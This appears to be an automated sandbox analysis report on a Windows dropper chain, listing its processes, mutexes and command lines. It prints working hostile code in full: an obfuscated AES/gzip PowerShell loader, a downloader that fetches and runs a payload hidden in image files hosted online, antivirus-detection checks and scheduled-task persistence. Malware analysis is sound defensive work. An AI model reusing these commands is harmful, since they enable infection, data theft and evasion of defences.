Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@113/228@0/21

Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe

9_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe

Code function: 9_2_004024FB CoCreateInstance,

9_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Mutant created: \Sessions\1\BaseNamedObjects\lEoISSVmRadFCSkwWUcz
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2416
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Mutant created: \Sessions\1\BaseNamedObjects\MVHEBzjxKloGkPj
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3604:120:WilError_03

Source: C:\Users\user\Desktop\random.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"

Source: C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe

Process created: C:\Windows\System32\cmd.exe cmd.exe /c 67a27a89a5061.vbs

Source: C:\Users\user\Desktop\random.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1072553001\750afc9298.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\random.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: dfd80aba08.exe, 00000007.00000003.2271891202.0000000005CA7000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000007.00000003.2275229883.0000000005C75000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2643152426.0000000005926000.00000004.00000800.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2663259254.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2807482532.000000000549A000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.2817262150.0000000005465000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: random.exe	Virustotal: Detection: 47%
Source: random.exe	ReversingLabs: Detection: 50%

Source: random.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: ae70ca0159.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: ae70ca0159.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 5a4a47dccd.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\random.exe

File read: C:\Users\user\Desktop\random.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe "C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe "C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe "C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe"
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe "C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process created: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe "C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2416 -s 940
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe "C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe "C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe "C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe "C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe"
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Process created: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe "C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1072550041\b6V4Rod.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Process created: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe "C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe "C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe "C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe "C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072553001\750afc9298.exe "C:\Users\user\AppData\Local\Temp\1072553001\750afc9298.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe "C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe"
Source: C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c 67a27a89a5061.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a27a89a5061.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe "C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe "C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.Sfgjgjk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe "C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe "C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe "C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe "C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe "C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe "C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1072550041\b6V4Rod.ps1"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe "C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe "C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
